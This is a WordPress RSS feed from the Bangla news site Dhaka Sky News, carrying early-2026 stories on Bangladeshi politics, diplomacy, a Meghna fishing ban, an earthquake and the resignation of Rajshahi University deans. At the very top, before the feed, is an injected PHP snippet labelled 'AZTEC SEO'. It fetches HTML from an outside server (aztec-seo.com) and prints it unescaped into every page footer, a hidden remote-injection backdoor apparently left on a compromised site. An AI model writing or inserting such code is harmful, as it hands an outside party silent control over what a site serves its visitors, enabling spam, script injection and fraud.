/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ঢাকা স্কাই নিউজ ডেস্ক – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Wed, 04 Mar 2026 11:30:42 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 দেশের সব সরকারি পরিত্যক্ত ভবন চিকিৎসাকেন্দ্র করার নির্দেশ প্রধানমন্ত্রীর https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/ https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/#respond Sat, 28 Feb 2026 12:43:10 +0000 https://www.dhakaskynews.com/?p=5613
সরকারি বিভিন্ন মন্ত্রণালয় ও সংস্থার পরিত্যক্ত ভবনগুলো চিহ্নিত করে সেগুলোকে স্বাস্থ্য ও পরিবার কল্যাণ মন্ত্রণালয়ের অধীনে নিয়ে স্বাস্থ্যকেন্দ্র করার নির্দেশনা দিয়েছেন প্রধানমন্ত্রী তারেক রহমান।
বুধবার (৪ মার্চ) দুপুরে সচিবালয়ে প্রধানমন্ত্রীর দপ্তরে স্বাস্থ্যমন্ত্রী, প্রতিমন্ত্রী, উপদেষ্টা এবং স্বাস্থ্য বিশেষজ্ঞদের সঙ্গে এক বৈঠকে এ নির্দেশনা দেন সরকারপ্রধান।
প্রধানমন্ত্রীর অতিরিক্ত প্রেস সচিব আতিকুর রহমান রুমন এ তথ্য জানিয়েছেন।
তিনি জানান, বৈঠকে সরকারি বিভিন্ন মন্ত্রণালয় ও সংস্থার পরিত্যক্ত ভবনগুলো চিহ্নিত করে সেগুলোকে স্বাস্থ্য ও পরিবার কল্যাণ মন্ত্রণালয়ের অধীনে নিয়ে ক্লিনিক ও চিকিৎসাকেন্দ্র করার বিষয়েও আলোচনা হয়েছে।
রুমন জানান, শুধুমাত্র এলজিইডির পরিত্যক্ত ভবন রয়েছে ১৭০টি। প্রধানমন্ত্রী বলেছেন- সরকারি ও এর অধীনস্থ বিভিন্ন প্রতিষ্ঠানের যে পরিত্যক্ত ভবনগুলো রয়েছে, সেগুলো ক্লিনিক ও চিকিৎসাকেন্দ্র হিসেবে গড়ে তুলতে হবে। এ ব্যাপারে তিনি মন্ত্রণালয়কে প্রয়োজনীয় নির্দেশনা দিয়েছেন।
অতিরিক্ত প্রেস সচিব বলেন, প্রধানমন্ত্রী ই-হেলথ কার্ড চালুর কাজ শুরু করতে স্বাস্থ্যমন্ত্রীকে যথাযথ নির্দেশনা দিয়েছেন। সরকারের নীতি হচ্ছে চিকিৎসাসেবা জনগণের দোরগোড়ায় পৌঁছে দেওয়া। এ ব্যাপারে মন্ত্রণালয়কে আরও সক্রিয় হওয়ার নির্দেশ দিয়েছেন প্রধানমন্ত্রী।
বৈঠকে স্বাস্থ্যমন্ত্রী সরদার মো. সাখাওয়াত হোসেন, প্রতিমন্ত্রী এমএ মুহিতসহ সরকারের ঊর্ধ্বতন কর্মকর্তারা উপস্থিত ছিলেন| সূত্র: যুগান্তন
]]>
https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/feed/ 0
প্রধানমন্ত্রী তারেক রহমানের সাক্ষাৎ চান শাহবাজ শ‌রিফ https://www.dhakaskynews.com/international/2026/02/27/News_ID-5604/ https://www.dhakaskynews.com/international/2026/02/27/News_ID-5604/#respond Fri, 27 Feb 2026 11:50:17 +0000 https://www.dhakaskynews.com/?p=5604 পা‌কিস্তানের প্রধানমন্ত্রী শাহবাজ শ‌রিফ ঢাকায় আসতে আগ্রহ প্রকাশ করেছেন। প্রধানমন্ত্রী তারেক রহমানের সঙ্গে সাক্ষাৎ কর‌তে চান তিনি।
সৌদি আরবের জেদ্দায় বাংলাদেশের পররাষ্ট্রমন্ত্রী ড. খলিলুর রহমা‌নের স‌ঙ্গে এক সাক্ষাৎকারে এ কথা জানান পাকিস্তানের উপপ্রধানমন্ত্রী ও পররাষ্ট্রমন্ত্রী ইসহাক দার।
শুক্রবার (২৭ ফেব্রুয়ারি) জেদ্দায় ওআইসির ফিলিস্তিনবিষয়ক কার্যনির্বাহী সভার ফাঁকে দুই পররাষ্ট্রমন্ত্রীর সাক্ষাৎ নি‌য়ে বাংলাদেশের পররাষ্ট্র মন্ত্রণালয় জা‌নি‌য়ে‌ছে, পাকিস্তানের পররাষ্ট্রমন্ত্রী প্রয়াত সাবেক প্রধানমন্ত্রী খালেদা জিয়ার সঙ্গে তার সাক্ষাতের কথা স্মরণ করেন।
ইসহাক দার বলেন, পাকিস্তানের প্রধানমন্ত্রী শাহবাজ শরিফ তারেক রহমানের সঙ্গে সাক্ষাতের জন্য অধীর আগ্রহে অপেক্ষা করছেন এবং তি‌নি ঢাকায় আসতে চান।
পা‌কিস্তা‌নের প্রধানমন্ত্রী আরও ব‌লেন, নতুন সরকারের অধীনে দুই দেশের সম্পর্ক ধারাবাহিকভাবে এগিয়ে যাবে। পাশাপাশি তি‌নি ফিলিস্তিন ও রোহিঙ্গা ইস্যুতে বাংলাদেশের অবস্থানের প্রশংসা ক‌রেন।
সাক্ষা‌তের সময় প্রধানমন্ত্রীর পররাষ্ট্রবিষয়ক উপদেষ্টা হুমায়ুন কবির সেখানে উপ‌স্থিত ছি‌লেন।

]]>
https://www.dhakaskynews.com/international/2026/02/27/News_ID-5604/feed/ 0
জাতিসংঘের নির্বাচনে বাংলাদেশকে সমর্থনের আশ্বাস কয়েকটি মুসলিম দেশের https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5598/ https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5598/#respond Fri, 27 Feb 2026 11:40:57 +0000 https://www.dhakaskynews.com/?p=5598 জাতিসংঘ সাধারণ পরিষদের ৮১তম অধিবেশনের সভাপতি পদে নির্বাচনে বাংলাদেশের প্রার্থিতার প্রতি পূর্ণ সমর্থন জানিয়েছে সৌদি আরব, পাকিস্তান, তুরস্ক, ফিলিস্তিনসহ বেশ কয়েকটি মুসলিম দেশ।
শুক্রবার জেদ্দায় ওআইসির জরুরি অধিবেশনের ফাঁকে পররাষ্ট্রমন্ত্রী খলিলুর রহমান এসব দেশের কূটনীতিকদের সঙ্গে বৈঠক করেন। এ সময় মুসলিম দেশগুলোর কূটনীতিকরা বাংলাদেশের প্রতি তাদের সমর্থনের কথা জানান।
পররাষ্ট্র মন্ত্রণালয় সূত্রে জানা যায়, পাকিস্তানের উপপ্রধানমন্ত্রী ও পররাষ্ট্রমন্ত্রী ইসহাক দার, সৌদি আরবের উপপররাষ্ট্রমন্ত্রী ওয়ালিদ আল এলখেরেজি, তুরস্কের উপপররাষ্ট্রমন্ত্রী মুসা কুলাকিলিকায়া, ফিলিস্তিনের পররাষ্ট্রমন্ত্রী ভারসেন আগাবেকিয়ান এবং গাম্বিয়ার পররাষ্ট্রমন্ত্রী সেরিং মোদাও বাংলাদেশকে সমর্থন জানানোর বিষয়ে আশ্বাস দেন।
পররাষ্ট্র মন্ত্রণালয় বিজ্ঞপ্তিতে জানিয়েছে, জেদ্দায় ইসলামি সহযোগিতা সংস্থার (ওআইসি) ফিলিস্তিনবিষয়ক জরুরি বৈঠকের ফাঁকে পররাষ্ট্রমন্ত্রী অংশগ্রহণকারী বিভিন্ন গুরুত্বপূর্ণ প্রতিনিধিদলের নেতাদের সঙ্গে দ্বিপক্ষীয় বৈঠক করেন এবং পারস্পরিক স্বার্থসংশ্লিষ্ট বিষয় নিয়ে আলোচনা করেন।
জুনে অনুষ্ঠেয় জাতিসংঘ সাধারণ পরিষদের ৮১তম অধিবেশনের সভাপতি পদে নির্বাচনে বাংলাদেশের প্রার্থী হিসেবে সরকার পররাষ্ট্রমন্ত্রী খলিলুর রহমানকে মনোনীত করেছে।
পররাষ্ট্র মন্ত্রণালয়ের বিজ্ঞপ্তিতে জানানো হয়েছে, ওআইসি প্রতিনিধিদলগুলোর নেতারা বাংলাদেশ জাতীয়তাবাদী দলের ব্যাপক বিজয় ও বাংলাদেশের প্রধানমন্ত্রী হিসেবে দায়িত্ব গ্রহণ করায় প্রধানমন্ত্রী তারেক রহমানকে আন্তরিক অভিনন্দন জানান। তারা আশা প্রকাশ করেন যে প্রধানমন্ত্রীর দক্ষ নেতৃত্বে বাংলাদেশ দ্রুত রাজনৈতিক স্থিতিশীলতা অর্জন করবে এবং উন্নয়ন ত্বরান্বিত হবে। তারা ফিলিস্তিন ইস্যুতে বাংলাদেশের অবিচল অঙ্গীকারেরও প্রশংসা করেন।
এতে আরও বলা হয়, বৈঠকে বিভিন্ন দেশের নেতারা জাতিসংঘ সাধারণ পরিষদের ৮১তম অধিবেশনের সভাপতিত্বের জন্য বাংলাদেশের প্রার্থিতার প্রতি পূর্ণ সমর্থন ব্যক্ত করেন।
পাকিস্তানের পররাষ্ট্রমন্ত্রী গত বছর প্রয়াত প্রধানমন্ত্রী খালেদা জিয়ার সঙ্গে তার বৈঠকের কথা উষ্ণতার সঙ্গে স্মরণ করেন। তিনি জানিয়েছেন, পাকিস্তানের প্রধানমন্ত্রী শাহবাজ শরীফ ব্যক্তিগতভাবে প্রধানমন্ত্রী তারেক রহমানকে শুভেচ্ছা জানাতে বাংলাদেশ সফরের প্রত্যাশায় রয়েছেন। পররাষ্ট্রমন্ত্রী ইসহাক দার আশা প্রকাশ করেন যে ঢাকায় নতুন সরকারের অধীনে দুই দেশের সম্পর্ক ধারাবাহিকভাবে উন্নত হবে।

]]>
https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5598/feed/ 0
আগামী দুই মাস নদীতে মাছ ধরা নিষিদ্ধ https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5589/ https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5589/#respond Fri, 27 Feb 2026 10:31:31 +0000 https://www.dhakaskynews.com/?p=5589 জাটকা সংরক্ষণ ও ইলিশের উৎপাদন বাড়াতে মার্চ-এপ্রিল দুই মাস মেঘনা নদীতে সকল ধরনের মাছ ধরা নিষিদ্ধ করেছে সরকার। এই নিষেধাজ্ঞার সময়সহ চার মাস প্রতি জেলে ভিজিএফের চাল পাবে ১৬০ কেজি। তবে মৎস্য কর্মকর্তা বলছেন, এই নিষেধাজ্ঞা বাস্তবায়ন করার জন্য নদীতে মৎস্য বিভাগ, উপজেলা-জেলা প্রশাসন,পুলিশ ও কোস্টগার্ডের সমন্বয়ে প্রতিদিন অভিযান পরিচালনা করা হবে। যারা আইন অমান্য করে নদীতে নামবে, তাদের জেল-জরিমানার বিধান রাখা হয়েছে।
জেলা মৎস্য অফিস ও জেলে সূত্রে জানায়, এই জেলায় ৫২ হাজার জেলে রয়েছে। এদের মধ্যে ৪৩ হাজার জেলে নিবন্ধিত। এসব জেলে মেঘনা নদীতে মাছ শিকার করে জীবিকা নির্বাহ করে। জাটকা সংরক্ষণ ও ইলিশের উৎপাদন বাড়াতে ১ মার্চ থেকে ৩০ এপ্রিল পর্যন্ত দুই মাস নদীতে সকল ধরনের জাল ফেলা ও মাছ ধরা নিষিদ্ধ ঘোষণা করা হয়েছে। এসময় লক্ষ্মীপুরের রামগতির আলেকজান্ডার থেকে চাঁদপুরের ষাটনল পর্যন্ত একশ’ কিলোমিটার এলাকাকে ইলিশের অভয়াশ্রম হিসেবে ঘোষণা করা হয়। এসময় সব রকমের ইলিশ সংরক্ষণ, আহরণ, পরিবহন, বাজারজাতকরণ ও মজুদকরণ নিষিদ্ধ রয়েছে। এছাড়া বরফকলগুলো বন্ধ থাকবে। জেলেদেরকে সচেতন করার জন্য নদী এবং উপকূলবর্তী এলাকায় মাইকিং ও পোষ্টারিংসহ সকল ধরনের প্রচারণা অব্যাহত রেখেছে জেলা প্রশাসন ও জেলা মৎস্য বিভাগ।
এদিকে চর আলেকজান্ডার থেকে রায়পুরের হাজীমারা পর্যন্ত ৩০টি মাছ ঘাট রয়েছে। এর পাশাপাশি নদী এলাকায় যেসব বরফ মিল রয়েছে সেগুলোও বন্ধ থাকবে। এই আইন অমান্য করলে জেল-জরিমানার বিধান রয়েছে।
মজু চৌধুরীর হাটের জেলে কালাম, মিন্টু, শরীফ হোসেন বলেন,জাটকা সংরক্ষণ ও ইলিশের উৎপাদনের লক্ষ্যে সরকার যে নিষেধাজ্ঞা দিয়েছে সেটা মেনে জেলেরা নদীতে যাবে না। কিন্তু জেলেদের পুনর্বাসন করার কথা থাকলেও সেটা এখন পর্যন্ত হয়নি। যে পরিমাণ জেলে রযেছে, সে পরিমাণ সরকারি খাদ্য সহায়তা দেয়া হয় না বলে অভিযোগ করেন জেলেরা। নিষেধাজ্ঞার সময় জেলেদের জন্য বরাদ্দকৃত চাল লুটপাট না করে সঠিক তালিকা তৈরি করে দ্রুত যেন তা পেতে পারে সেটা নিশ্চিত করার দাবি জানান।
বরফ মিল মালিকরা বলেন, সরকারি নিষেধাজ্ঞা মেনে বরফগুলো বন্ধ করে দেয়া হয়েছে। কিন্তু এ সময়ে বরফ মিল মালিকদের অনেক লোকসানে পড়তে হয়। যদি সরকারি বরফ কল সহযোগিতা করত,তাহলে অনেক ভালো হতো বলে দাবী করেন তারা।
লক্ষ্মীপুর সদর উপজেলা সিনিয়র মৎস্য কর্মকর্তা মো. মাহামুদুল হাসান চৌধুরী বলেন, দুই মাসের নিষেধাজ্ঞা বাস্তবায়ন করার জন্য নদীতে মৎস্য বিভাগ, উপজেলা-জেলা প্রশাসন, পুলিশ ও কোস্টগার্ডের সমন্বয়ে প্রতিদিন অভিযান পরিচালনা করা হবে। নিষেধাজ্ঞা অমান্য করে নদীতে নামলে জেল-জরিমানার বিধান রাখা হয়েছে। এরপরও যারা আইন অমান্য করে নদীতে যাবে,তাদের বিরুদ্ধে আইনগত ব্যবস্থা নেয়া হবে। এবারও অভিযান সফল হলে অধিক পরিমাণ ইলিশ উৎপাদনের সম্ভাবনা রয়েছে।
জেলা প্রশাসক এসএম মেহেদী হাসান বলেন, জাটকা সংরক্ষণ ও ইলিশের উৎপাদন বাড়াতে দুই মাসের নিষেধাজ্ঞা বাস্তবায়নে কাজ করছে জেলা ও উপজেলা প্রশাসনের নেতৃত্বে টাস্কফোর্সের সমন্বয় কমিটি। নিষেধাজ্ঞা অমান্য করলে কঠোর ব্যবস্থা নেয়া হবে। পাশাপাশি ভিজিএফের চাল নিয়ে কোনো অনিয়ম পেলে আইনগত ব্যবস্থা নেয়া হবে বলে জানান তিনি। সূত্র: বাসস।

]]>
https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5589/feed/ 0
জাতিসংঘ সাধারণ পরিষদের সভাপতি প্রার্থী ড. খলিলুর https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5584/ https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5584/#respond Fri, 27 Feb 2026 10:02:44 +0000 https://www.dhakaskynews.com/?p=5584 জাতিসংঘের ৮১তম সাধারণ পরিষদ অধিবেশনের সভাপতি নির্বাচন আগামী ২ জুন অনুষ্ঠিত হবে। এবারের নির্বাচনে প্রার্থী দিয়েছে বাংলাদেশ ও সাইপ্রাস। আলোচনায় থাকলেও ফিলিস্তিন তাদের প্রার্থিতা প্রত্যাহার করেছে।
পররাষ্ট্র মন্ত্রণালয় সূত্রে জানা গেছে, বাংলাদেশের পক্ষ থেকে শুরুতে মনোনয়ন দেওয়া হয়েছিল সাবেক পররাষ্ট্র উপদেষ্টা মো. তৌহিদ হোসেনকে। তবে তিনি বর্তমানে দায়িত্বে না থাকায় তার পরিবর্তে পররাষ্ট্রমন্ত্রী ড. খলিলুর রহমানকে নতুন প্রার্থী হিসাবে মনোনীত করা হয়েছে।
পররাষ্ট্র মন্ত্রণালয় সূত্র জানিয়েছে, প্রধানমন্ত্রী তারেক রহমান পররাষ্ট্রমন্ত্রী ড. খলিলুর রহমানকে বাংলাদেশের প্রার্থী হিসাবে মনোনয়ন দিয়েছেন। ভোটের আগে সমন্বিত কূটনৈতিক প্রচারণা নিশ্চিত করতে প্রয়োজনীয় নির্দেশনাও দিয়েছেন তিনি।
আগামী সেপ্টেম্বরে শুরু হবে জাতিসংঘের ৮১তম সাধারণ পরিষদের অধিবেশন। তার আগে ২ জুন নিউইয়র্কে জাতিসংঘ সদর দপ্তরের সাধারণ পরিষদ হলে সভাপতির নির্বাচন অনুষ্ঠিত হবে। প্রতিষ্ঠিত আঞ্চলিক আবর্তন নীতিমালা অনুযায়ী এবার এশিয়া-প্যাসিফিক গ্রুপ অব স্টেটস থেকে সভাপতি নির্বাচিত হওয়ার কথা।
৮১তম সাধারণ পরিষদের সভাপতি পদে ফিলিস্তিনকে আসন ছেড়ে দেওয়ার গুঞ্জন থাকলেও শেষ পর্যন্ত তারা প্রার্থিতা প্রত্যাহার করেছে। ফিলিস্তিনের দাবি-কয়েকটি দেশের কূটনৈতিক চাপের মুখে তারা এ সিদ্ধান্ত নিতে বাধ্য হয়েছে।
২০২১ সালে জাতিসংঘ সাধারণ পরিষদের ৭৬তম অধিবেশনের সহসভাপতি নির্বাচিত হয়েছিল বাংলাদেশ। এর আগে ২০১৬-১৭ মেয়াদে ৭১তম অধিবেশনে সহসভাপতির দায়িত্ব পালন করে বাংলাদেশ। প্রায় চার দশক পর জাতিসংঘ সাধারণ পরিষদের সভাপতি পদে নির্বাচনে প্রতিদ্বন্দ্বিতা করছে বাংলাদেশ।
পররাষ্ট্রমন্ত্রীকে মিয়ানমার ও আরাকান আর্মির অভিনন্দন : পররাষ্ট্রমন্ত্রী ড. খলিলুর রহমানকে অভিনন্দন জানিয়েছেন মিয়ানমারের পররাষ্ট্রমন্ত্রী থান সুয়ে।
এদিকে প্রথমবারের মতো বাংলাদেশের পররাষ্ট্রমন্ত্রীকে অভিনন্দন বার্তা পাঠিয়েছেন ইউনাইটেড লীগ অব আরাকান’র (ইউএলএ) চেয়ারম্যান ও আরাকান আর্মির প্রধান ত্বান ম্রাত নাইং।
এদিকে অভিনন্দন বার্তায় মিয়ানমারের পররাষ্ট্রমন্ত্রী থান সোয়ে নেপিডো এবং ঢাকার মধ্যে দ্বিপাক্ষিক সম্পর্ক বৃদ্ধি এবং সহযোগিতা জোরদার করার দৃঢ় প্রতিশ্রুতি ব্যক্ত করেছেন।
এছাড়া আরাকান সেনাপ্রধান ও ইউএলএ চেয়ারম্যান ত্বান ম্রাত নাইং অভিনন্দন বার্তায় বলেন, বাংলাদেশের পররাষ্ট্রমন্ত্রী হিসাবে আপনার নতুন দায়িত্বে, আমি আশা করি আপনি বাস্তবসম্মত ও টেকসই সমাধান খুঁজে বের করার জন্য আমাদের সঙ্গে কাজ চালিয়ে যাবেন। আমাদের বিদ্যমান সদিচ্ছার ওপর ভিত্তি করে এখন বাংলাদেশ ও আরাকানের মধ্যে বন্ধুত্বের একটি নতুন পথ তৈরি করার সুযোগ রয়েছে।

]]>
https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5584/feed/ 0
ভয়াবহ ভূমিকম্পে কেঁপে উঠল দুই বাংলা https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5576/ https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5576/#respond Fri, 27 Feb 2026 09:02:13 +0000 https://www.dhakaskynews.com/?p=5576 রাজধানী ঢাকাসহ দেশের বিভিন্ন স্থানে ভয়াবহ মাত্রার ভূমিকম্প অনুভূত হয়েছে।শুক্রবার (২৭ ফেব্রুয়ারি) দুপুর ১টা ৫৪ মিনিটে এই ভূমিকম্প অনুভূত হয়।
ইউরোপীয়-ভূমধ্যসাগরীয় সিসমোলজিক্যাল সেন্টারের (ইএমএসসি) তথ্য অনুযায়ী, রিখটার স্কেলে এই ভূমিকম্পের মাত্রা ছিল ৫ দশমিক ৩।
সংস্থাটি জানিয়েছে, ভূমিকম্পটির উৎপত্তিস্থল সাতক্ষীরা থেকে ২৯ কিলোমিটার দক্ষিণ-পূর্বে। এর গভীরতা ছিল ভূপৃষ্ঠ থেকে ৩৫ কিলোমিটার।
এদিকে রিখটার স্কেলে ভূমিকম্পের মাত্রা ৫ দশমিক ৪ বলে জানিয়েছেন আবহাওয়া অধিদপ্তরের ভূমিকম্প পর্যবেক্ষণ কেন্দ্রের আবহাওয়াবিদ ফারজানা সুলতানা। এটি মাঝারি মাত্রার ভূমিকম্প বলে জানিয়েছেন আবহাওয়া অধিদপ্তরের ভূমিকম্প পর্যবেক্ষণ কেন্দ্রের ভারপ্রাপ্ত কর্মকর্তা রুবাইয়াৎ কবীর।
যুক্তরাষ্ট্রের ভূতাত্ত্বিক জরিপ সংস্থা ইউএসজিএস বলছে, উৎপত্তিস্থলে ভূমিকম্পের মাত্রা ৫ দশমিক ৩।
তবে ঢাকা বিশ্ববিদ্যালয়ের ভূতত্ত্ব বিভাগের সাবেক অধ্যাপক হুমায়ূন আখতার জানান, পরপর দুই দফা এই ভূমিকম্প অনুভূত হয়। উৎপত্তিস্থল সাতক্ষীরা বলে তিনিও জানিয়েছেন ।
এদিকে বাংলাদেশের পাশাপাশি ভারতের কলকাতায়ও ভূকম্পন অনুভূত হয়েছে। সেখানে মাত্রা ছিল ৫ দশমিত ৩।
আনন্দবাজারের প্রতিবেদন বলছে, শুক্রবার দুপুরে উত্তর থেকে দক্ষিণ কলকাতায় কম্পন অনুভূত হয়েছে। কয়েক সেকেন্ড টানা কেঁপেছে শহরের বিভিন্ন বহুতল। ভয়ে এবং আতঙ্কে বাড়ি, অফিস ছেড়ে অনেকে বাইরে বেরিয়ে যান। কয়েকটি পুরনো বাড়ি হেলে পড়ার খবর পাওয়া গেছে।
পশ্চিমবঙ্গের অন্যান্য জেলাতেও কম্পন অনুভূত হয়েছে। পশ্চিমবঙ্গের টাকি থেকে ভূমিকম্পের উৎপত্তিস্থল খুলনার দূরত্ব প্রায় ২৬ কিলোমিটার। কলকাতার পাশাপাশি দক্ষিণবঙ্গের জেলাগুলিতে জোরালো কম্পন অনুভূত হয়েছে। পশ্চিম মেদিনীপুরের মেদিনীপুর শহরেও আতঙ্ক ছড়ায়। এলাকার বাড়ি এবং আবাসন নড়ে যায়। বন্ধ থাকা সিলিং ফ্যান দুলতে থাকে বেশ কিছুক্ষণ। একই ভাবে ঝাড়গ্রাম জেলাতেও ভূমিকম্পের অনুভূতি পেয়েছেন অনেকেই। হাওড়া এবং হুগলিতেও একই পরিস্থিতি।
তাৎক্ষণিকভাবে এই ভূমিকম্পে কোনো ক্ষয়ক্ষতি বা হতাহতের খবর পাওয়া যায়নি।
ঢাকাসহ দেশের বিভিন্ন স্থানে গত বুধবার রাতে ভূকম্পন অনুভূত হয়। রিখটার স্কেলে এর মাত্রা ছিল ৫ দশমিক ১। ওই ভূমিকম্পের উৎপত্তিস্থল ছিল মিয়ানমারে। এটি ছিল মাঝারি মাত্রার ভূমিকম্প।

]]>
https://www.dhakaskynews.com/bangladesh/2026/02/27/News_ID-5576/feed/ 0
আন্দোলনের মুখে রাবির ৬ আওয়ামীপন্থী ডিনের পদত্যাগ https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/ https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/#respond Sun, 21 Dec 2025 19:31:49 +0000 https://www.dhakaskynews.com/?p=5569 আন্দোলনের মুখে অবশেষে পদত্যাগ করলেন রাজশাহী বিশ্ববিদ্যালয়ের (রাবি) আওয়ামী লীগপন্থি ছয় ডিন। পদত্যাগ দাবিতে উপাচার্য, উপ-উপাচার্য, প্রক্টর, রেজিস্ট্রারসহ প্রশাসন ভবনে সব দপ্তরে তালা লাগানোসহ দিনভর নানা ঘটনার পর দায়িত্ব থেকে সরে দাঁড়ালেন তারা।
রোববার (২১ ডিসেম্বর) রাতে বিশ্ববিদ্যালয়ের রেজিস্ট্রার অধ্যাপক ইফতিখারুল আলম মাসুদ এ তথ্য নিশ্চিত করেছেন।
এর আগে দুপুর ১টায় তাদের পদত্যাগ দাবিতে এসব কার্যালয়ে তালা ঝুলিয়ে দেন একদল শিক্ষার্থী। এ নিয়ে উপ-উপাচার্য অধ্যাপক ফরিদ উদ্দিনের সঙ্গে শিক্ষার্থী ও ছাত্রশিবির নেতাদের বাগবিতণ্ডা হয়। এর আগে কলা, সামাজিক বিজ্ঞান ও আইন অনুষদের ডিনদের কার্যালয়েও তালা ঝুলিয়ে দেন শিক্ষার্থীরা। পরে বেলা সাড়ে ৩টার দিকে প্রশাসনের ঊর্ধ্বতন কর্মকর্তাদের সঙ্গে আলোচনায় বসেন শিক্ষার্থীরা। সেখানে ডিনদের অপসারণের আশ্বাস দেওয়া হলে তালা খুলে দেওয়া হয়। এ নিয়ে সন্ধ্যা ৭টায় জরুরি বৈঠকে বসেন উপাচার্য। বৈঠকের পর তার ও উপ-উপাচার্যের মত জানার চেষ্টা করেও পাওয়া যায়নি।
তবে এক ডিন যুগান্তরকে বলেন, ‘ভিসি আমাদের ডেকেছিলেন। আমরা আগেও মৌখিকভাবে দায়িত্ব না দেওয়ার কথা বলেছিলাম। আজ লিখিতভাবে দায়িত্ব পালনে অপারগতার কথা জানিয়ে এসেছি।’
পরে বিশ্ববিদ্যালয়ের জনসংযোগ দপ্তরও তাদের পদত্যাগের বিষয়টি যুগান্তরকে নিশ্চিত করে।
১৮ ডিসেম্বর এসব ডিনদের মেয়াদ শেষ হয়েছে। তবে তাদের মেয়াদ বাড়ান উপাচার্য। এর পরিপ্রেক্ষিতে আওয়ামীপন্থি ছয়জনের পদত্যাগ দাবিতে আলটিমেটাম দেন রাকসুর জিএস সালাহউদ্দিন আম্মার। এই দাবি আরও জোরদার হয় জুলাই যোদ্ধা শরীফ ওসমান হাদির মৃত্যুর পরে। গত কয়েক দিনের প্রতিবাদ সমাবেশ থেকে আওয়ামীপন্থি শিক্ষকদের শাস্তির দাবিতে আলটিমেটাম দেওয়া হয়। সেই মোতাবেক রোববার দুপুর ১টার দিকে তিন ডিনের কার্যালয়ে তালা দেওয়া হয় এবং সাবেক উপাচার্য অধ্যাপক গোলাম সাব্বির সাত্তার ক্লাশ নিচ্ছেন জানতে পেরে তার বিভাগেও যান তারা। পরে আওয়ামীপন্থি ডিন ও শিক্ষকদের অপসারণের দাবিতে প্রশাসন ভবনের উপাচার্য, উপ-উপাচার্যসহ একাধিক ঊর্ধ্বতন কর্মকর্তাদের কার্যালয়ে তালা দেন রাকসু প্রতিনিধি ও একদল শিক্ষার্থী। সেখানে উপস্থিত হন শাখা ছাত্রশিবিরের নেতাকর্মীরা।
এ সময় উপ-উপাচার্য অধ্যাপক ফরিদ উদ্দিন খানের সঙ্গে বাগবিতণ্ডা হয়। পরে বিকাল সাড়ে ৪টা পর্যন্ত প্রশাসন ভবনে উপাচার্যের সম্মেলন কক্ষে তাদের সঙ্গে ঊর্ধ্বতন কর্মকর্তাদের আলোচনা চলে। এতে তাদের সন্ধ্যা সাড়ে ৬টায় জরুরি সভায় বসে সিদ্ধান্ত জানানোর আশ্বাস দেওয়া হয়।
কার্যালয়ে তালা দেওয়া ডিনরা হলেন- আইন অনুষদের অধ্যাপক আবু নাসের মো. ওয়াহিদ, ব্যবসায় শিক্ষা অনুষদের অধ্যাপক এএসএম কামরুজ্জামান এবং সামাজিক বিজ্ঞান অনুষদের অধ্যাপক এসএম এক্রাম উল্যাহ।
অন্য তিন ডিন হলেন- বিজ্ঞান অনুষদের নাসিমা আখতার, প্রকৌশল অনুষদের বিমল কুমার প্রামাণিক এবং ভূবিজ্ঞান অনুষদের এএইচএম সেলিম রেজা।
কর্মসূচিতে রাকসুর জিএস সালাহউদ্দিন আম্মার, সিনেট সদস্য আকিল বিন তালেব, রাকসুর সংস্কৃতি বিষয়ক সম্পাদক জায়িদ হাসান জোহা, মিডিয়া ও প্রকাশনা সম্পাদক ইসলাম, সহসাংস্কৃতিক সম্পাদক রাকিবুল হাসান, ইসলামী ছাত্রশিবিরের সেক্রেটারি মুজাহিদ ফয়সাল, বিশ্ববিদ্যালয় শাখা ছাত্রপক্ষের আহ্বায়ক গোলাম মোস্তফা প্রমুখ উপস্থিত ছিলেন।
এদিকে সকালে ছয় অনুষদের আওয়ামীপন্থি ডিনদের পদত্যাগের দাবিতে সালাহউদ্দিন আম্মার রাকসু ভবনের সামনে অবস্থান নেন। ছয় ডিনের কেউ ক্যাম্পাসে না থাকায় গণমাধ্যমকর্মীদের সামনে একে একে তাদের সবাইকে কল করেন তিনি। একই সঙ্গে তাদের উদ্দেশে লেখা পদত্যাগপত্রও প্রকাশ করেন।
পরে দুপুরে সালাহউদ্দিন আম্মার এক ফেসবুক পোস্টে লিখেছেন- ‘আজ মোটামুটি সব দপ্তরে আওয়ামীপন্থিদের দপ্তরগুলো তালাবদ্ধ। আমিও এটাই চাই, বিচার না হওয়া পর্যন্ত তালাবদ্ধ থাকুক। সঙ্গে সঙ্গে একটা তালিকা করেছি বিগত জুলাইয়ে বিভিন্ন সময়ে শিক্ষার্থীদের বিপক্ষে অবস্থান করা শিক্ষকদের।’
এ বিষয়ে তখন সামাজিক বিজ্ঞান অনুষদের ডিন অধ্যাপক এসএম এক্রাম উল্যাহ বলেন, আমি এ পরিস্থিতিতে ডিন থাকতে চাচ্ছি না। উপাচার্যের কাছে দায়িত্ব হস্তান্তর করেছি। উপাচার্য যে সিদ্ধান্ত নেবেন, সেটাই হবে।
